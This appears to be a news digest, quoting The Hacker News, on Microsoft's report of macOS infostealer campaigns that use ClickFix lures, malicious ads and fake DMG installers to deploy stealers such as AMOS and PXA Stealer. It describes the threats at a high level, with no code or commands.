"The tech giant's Defender Security Research Team said it observed macOS-targeted infostealer campaigns using social engineering techniques such as ClickFix since late 2025 to distribute disk image (DMG) installers that deploy stealer malware families like Atomic macOS Stealer ( AMOS), MacSync, and DigitStealer. The campaigns have been found to use techniques like fileless execution, native macOS utilities, and AppleScript automation to facilitate data theft."
"This includes details like web browser credentials and session data, iCloud Keychain, and developer secrets. The starting point of these attacks is often a malicious ad, often served through Google Ads, that redirects users searching for tools like DynamicLake and artificial intelligence (AI) tools to fake sites that employ ClickFix lures, tricking them into infecting their own machines with malware."
""Python-based stealers are being leveraged by attackers to rapidly adapt, reuse code, and target heterogeneous environments with minimal overhead," Microsoft said. "They are typically distributed via phishing emails and collect login credentials, session cookies, authentication tokens, credit card numbers, and crypto wallet data." One such stealer is PXA Stealer, which is linked to Vietnamese-speaking threat actors and is capable of harvesting login credentials, financial information, and browser data."
Information-stealing campaigns now target macOS by using cross-platform languages like Python and abusing trusted distribution channels. Attackers use social-engineering lures such as ClickFix and malicious ads to redirect users to fake sites that deliver DMG installers. Deployed stealer families include AMOS, MacSync, DigitStealer, and PXA Stealer. Techniques observed include fileless execution, native macOS utilities, AppleScript automation, and standard persistence mechanisms on other platforms. Initial access commonly stems from phishing emails or malicious ads, with Telegram used for command-and-control and exfiltration. Stolen data includes browser credentials, session cookies, iCloud Keychain, developer secrets, financial information, and crypto wallet data.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]